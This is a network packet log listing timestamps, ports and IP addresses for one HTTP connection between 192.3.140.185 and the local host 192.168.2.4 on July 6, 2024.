Jul 6, 2024 13:27:15.852399111 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852407932 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852411032 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852431059 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852459908 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853445053 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853486061 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853534937 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853542089 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853550911 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853590965 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853673935 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853688002 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853701115 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853713989 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853744984 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853744984 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853837967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853848934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853858948 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853876114 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853883028 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853905916 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853918076 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853925943 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853926897 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853940010 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853951931 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.853976011 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.853998899 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854161024 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854265928 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854362011 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854373932 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854384899 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854397058 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854408026 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854413986 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854420900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854434013 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854444027 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854444981 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854460001 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854466915 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854480028 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854486942 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854491949 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854506969 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854515076 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854518890 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854532003 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854547024 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854554892 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854579926 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854914904 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854927063 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854937077 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854948044 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854962111 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.854969025 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854979992 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854991913 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.854995966 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855004072 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855011940 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855016947 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855029106 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855060101 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855114937 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855128050 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855139971 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855151892 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855158091 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855163097 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855175972 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855189085 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855196953 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855201960 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855214119 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855222940 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855237007 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855245113 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855252028 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855263948 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855274916 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.855288029 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.855300903 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856018066 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856029987 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856040955 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856054068 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856062889 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856067896 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856081009 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856090069 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856093884 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856102943 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856107950 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856125116 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856129885 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856137991 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856148958 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856157064 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856163979 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856177092 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856189013 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856198072 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856208086 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856213093 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856220961 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856232882 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856235027 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856281042 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856786966 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856800079 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856810093 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856822014 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856833935 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856834888 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856856108 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856857061 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856870890 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856889009 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856911898 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856913090 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856923103 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856933117 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856935978 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856949091 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856961012 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856971979 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856971979 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856985092 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.856988907 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.856997967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857009888 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.857013941 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857027054 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857032061 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.857038975 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857050896 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857063055 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857069969 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.857080936 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.857609034 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857621908 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857634068 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857646942 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.857659101 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.857690096 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.178946018 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179387093 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179435968 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179524899 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179547071 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179560900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179573059 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179585934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179595947 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179600000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179620981 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179634094 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179636002 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179646969 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179651976 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179660082 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179670095 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179682970 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179696083 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179713011 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179716110 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179724932 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179728031 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179738998 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179750919 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179763079 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179775000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179776907 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179790020 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179800987 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179802895 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179811001 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179816961 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179827929 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179838896 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179843903 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179862022 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179868937 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179873943 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179886103 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179898024 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179909945 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179914951 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179923058 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179934025 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179940939 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179945946 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179949045 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179959059 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179971933 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.179976940 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.179985046 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180001974 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180005074 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180013895 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180025101 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180027008 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180039883 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180052996 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180057049 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180064917 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180074930 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180077076 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180089951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180103064 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180107117 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180114985 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180128098 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180139065 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180147886 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180157900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180169106 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180171967 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180180073 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180186987 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180198908 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180208921 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180212021 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180223942 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180237055 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180239916 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180249929 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180262089 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180263042 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180274010 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180285931 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180295944 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180310965 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180324078 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180330038 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180336952 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180349112 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180360079 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180366039 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180378914 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180385113 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180389881 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180402994 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180411100 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180413008 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180427074 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180437088 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180448055 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180459976 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180459976 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180484056 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180538893 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180636883 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180651903 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180663109 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180675983 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180686951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180690050 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180701017 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180711031 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180715084 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180723906 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.180736065 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.180748940 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181402922 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181443930 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181529045 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181543112 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181552887 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181566000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181576967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181587934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181592941 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181602955 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181607962 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181622028 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181632042 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181636095 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181638956 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181663036 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181678057 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181734085 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181759119 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181838989 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181857109 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181868076 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181880951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181893110 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181904078 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181906939 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181916952 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181927919 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181930065 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.181969881 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.181969881 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.182694912 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182707071 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182720900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182732105 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182742119 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182744980 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.182754040 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182765961 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.182766914 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182785988 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182806969 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.182833910 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.182898998 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182912111 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182928085 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.182967901 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183043003 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183054924 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183063030 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183073997 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183084965 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183084965 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183094978 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183095932 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183106899 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183115005 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183119059 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183134079 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183137894 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183146000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183156967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.183165073 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183167934 CEST	80	49739	192.3.140.185	192.168.2.4
